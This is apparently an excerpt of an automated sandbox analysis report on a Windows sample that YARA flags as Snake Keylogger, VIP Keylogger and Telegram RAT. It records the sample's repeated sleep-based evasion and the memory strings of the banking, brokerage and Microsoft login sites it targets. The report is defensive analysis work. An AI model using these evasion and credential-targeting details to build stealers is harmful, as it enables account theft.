                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 595610Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 595395Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 595278Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 595168Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 595063Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 594938Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 594813Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 594688Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 594578Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 594469Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 594344Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 594235Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 594110Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 593985Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 593860Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 593735Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 593610Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeWindow / User API: threadDelayed 3035Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeWindow / User API: threadDelayed 6785Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep count: 34 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -600000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -599875s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4708Thread sleep count: 3035 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4708Thread sleep count: 6785 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -599766s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -599656s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -599547s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -599438s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -599313s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -599188s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -599078s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -598969s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -598844s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -598734s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -598609s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -598499s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -598340s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -598191s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -598071s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -597969s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -597860s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -597735s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -597610s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -597485s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -597360s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -597235s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -597110s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -596985s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -596860s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -596735s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -596610s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -596485s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -596360s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -596235s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -596110s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -595985s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -595813s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -595610s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -595395s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -595278s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -595168s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -595063s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -594938s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -594813s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -594688s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -594578s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -594469s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -594344s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -594235s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -594110s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -593985s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -593860s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -593735s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916Thread sleep time: -593610s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 599875Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 599766Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 599656Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 599547Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 599438Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 599313Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 599188Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 599078Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 598969Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 598844Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 598734Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 598609Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 598499Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 598340Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 598191Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 598071Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 597969Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 597860Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 597735Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 597610Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 597485Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 597360Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 597235Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 597110Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 596985Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 596860Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 596735Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 596610Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 596485Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 596360Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 596235Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 596110Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 595985Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 595813Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 595610Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 595395Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 595278Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 595168Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 595063Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 594938Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 594813Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 594688Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 594578Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 594469Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 594344Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 594235Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 594110Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 593985Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 593860Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 593735Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 593610Jump to behavior
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4034472681.0000000000EF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_05828AA8 LdrInitializeThunk,0_2_05828AA8
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeMemory allocated: page read and write | page guardJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeQueries volume information: C:\Users\user\Desktop\Lpjrd6Wxad.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Stealing of Sensitive Information

                          barindex
                          Yara detected Snake Keylogger
                          Source: Yara matchFile source: 00000000.00000002.4035317693.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Yara detected Telegram RAT
                          Source: Yara matchFile source: Lpjrd6Wxad.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.Lpjrd6Wxad.exe.850000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Lpjrd6Wxad.exe PID: 3648, type: MEMORYSTR
                          Yara detected VIP Keylogger
                          Source: Yara matchFile source: Lpjrd6Wxad.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.Lpjrd6Wxad.exe.850000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.4035317693.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Lpjrd6Wxad.exe PID: 3648, type: MEMORYSTR
